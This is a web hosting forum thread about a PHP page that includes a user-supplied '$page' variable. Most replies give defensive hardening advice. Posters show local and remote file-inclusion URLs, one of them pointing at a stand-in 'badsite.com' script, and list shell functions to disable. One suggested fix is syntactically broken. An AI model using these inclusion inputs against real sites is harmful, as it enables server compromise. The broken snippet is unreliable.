One of the sites I host has a php page with this statement in it:
<?php include ($page); ?>

The reason I looked at this site is that it was possible to get the page to download a file to /tmp using wget. Was the statement above what allowed this?

If so, would it also be possible to execute a program which was downloaded to /tmp?

This is exactly why register_globals is off by default on new php versions.

For example ... someone can simply do this :

index.php?page=/secret.txt

and then $page will be "/secret.txt", and the script will happily include it.

Maybe you should ask whoever coded the page to recode it (there are a few ways to avoid these types of security problems).

That's not what your question asked, but I thought I'd add that in there ... now on to your question :

wget is simply a program to download webpages/files off of the internet. It is possible to block wget-specific requests (by doing a check for client requests from wget) -- but it would be moot.

Blocking requests from wget would be the same as asking to create site that would only be visible to IE browsers.

That statement alone didn't allow (or can allow) wget, but its a problem as it is.

Yes, it is possible to run programs from /tmp.

Too dangerous to even think of using it.

Well.. You never want to just use input taken from the user on blind faith.. You should filter every inputed varible..

Notify the user to please fix the code in the php script so that it prevents manipulation from an attacker.

You can suggest the user add an array and supply possible variables (files) in the array, then to have the script check for the file in the array. If it finds it, load that variable/page otherwise load a default page.

Give them a choice:
- Either fix/remove the code or you will be left no choice but to remove the file as in the steps to prevent harm to your server.

you can use the function : file_exist, to get rid of people including harmful codes into your server (that means even you can't have anything that harms your own server)

i'm also a complete newbie.. but perhaps this will work:
<?php if(file_exist("$page")); include("$page"); else print('file not found'); exit; ?>

$allowed_pages = Array(
'page1.php';
'dir/page2.php';
}

if (in_array($_GET['page'],$allowed_pages))
include($_GET['page']);

Something along these lines would be a safer alternative.

Defacers love to find pages like that. It opens it right on up and yes it allows them to dump al kinds of programs in tmp and run them. Things like jacktheripper, bindshell, etc etc

Leave it long enough and they will gain root. In the mean time they will deface your web sites and make your customers very leery of your security.

Originally posted by Monte
Defacers love to find pages like that. It opens it right on up and yes it allows them to dump al kinds of programs in tmp and run them. Things like jacktheripper, bindshell, etc etc

Hi Monte, how can that be used to write to the server?

Include only parses php from a file and if it isn't, just output it onto the page? How can it be used to download files into /tmp?

Well I am not going to post the how tos here in the public or every kiddie reading this forum will be out trying it tonight. But take my word for it. Show me a web page like that and I can deface your box and start my way to gaining root on your box.

I found several URL's that are helpers just for this purpose set up by defacers. How? They cracked a couple of my resold boxes using just this exploit on php pages. I spent days doing a post mortem on the hack so I could understand it and stop it. I traced and tacked it back to the origin and found some of their launching pads for hack. Lots of sites on geo cities, tripod, lycos and other free web host.

Includes in php pages are dangerous to your server and the web site it is hosted on.

Couple of things you can do to slow them down, make /tmp no execute, add allow-url-fopen = False to your php.ini file, register globals off, php safemod on.

Can you explain to me? What's "/tmp"?

yoshi

Hehehe thanks I know how :)

Originally posted by Quadra
Hehehe thanks I know how :)

Some how I figured you did. :D

you can also use safe_mode to exclude certain directories from being included.

yeah its a little dangerous

Originally posted by fyrestrtr
For example ... someone can simply do this :

index.php?page=/secret.txt

and then $page will be "/secret.txt", and the script will happily include it.

It gets worse then that...
index.php?page=http://badsite.com/somescript.txt

this will make it download and include the code!
So if somescript.txt has say
<?php
phpinfo();
?>

it will execute it on the server!!

Someone said register_globals=off should do it. Well that will not help as one can easily circumvent it using $_GET. Also how many PHP files will you check on your server? There are several practical ways you can follow even if your clients use page=file.html syntax. These already have mention in several WHT threads.
1. Chmod wget and other files which only superuser should have access to 700 or 744 mode. This will help you not only in this case but also where CGI scripting comes.
2.Have following directives in your php.ini
disable_functions = dl,exec,passthru,proc_open,proc_close,shell_exec,system
allow_url_fopen = Off
3. Use open_basedir directive for each virtual host. This you can do from WHM.

Hope it helps you

K Singh

safe_mode is great, but if you use a number of publicly available scripts, you will need safe_mode off.

The problem with allow_url_fopen = Off is that many clients will complain about it.

There isn't anything wrong/dangerous with using include like this is there?
<?php
include("blah.php");
?>

No, there isn't, because the filename is specified.

See with include ($page), I could go to say
http://www.mydomain.com/page.php (which should include a global page), and tell it, WAIT I don't want you to include the one you're supposed to, instead, let's do this:
http://www.mydomain.com/page.php?page=blahdebladeblahdeblahdeblah
and it'd include the one -=I=- told it to , not the correct page.

With the way you suggested, it's not possible to do that.

I just noticed this discussion - Look at this page for how to use PHP include safely:
apv-webdesign.nl/weblog/archives/be_careful_with_the_include_function__24-01-2004.php

Regards, Arno

Originally posted by fyrestrtr
This is exactly why register_globals is off by default on new php versions.

For example ... someone can simply do this :

index.php?page=/secret.txt

What exactly does register globals do anyways?

When you have stuff like $_POST['page'] OR $_GET['page'], it makes you allowed to use $page.

You can also tell the owner of that file to hard code the filename, instead of using $page, you can use the one that is necessary, e.g.
include("header.php");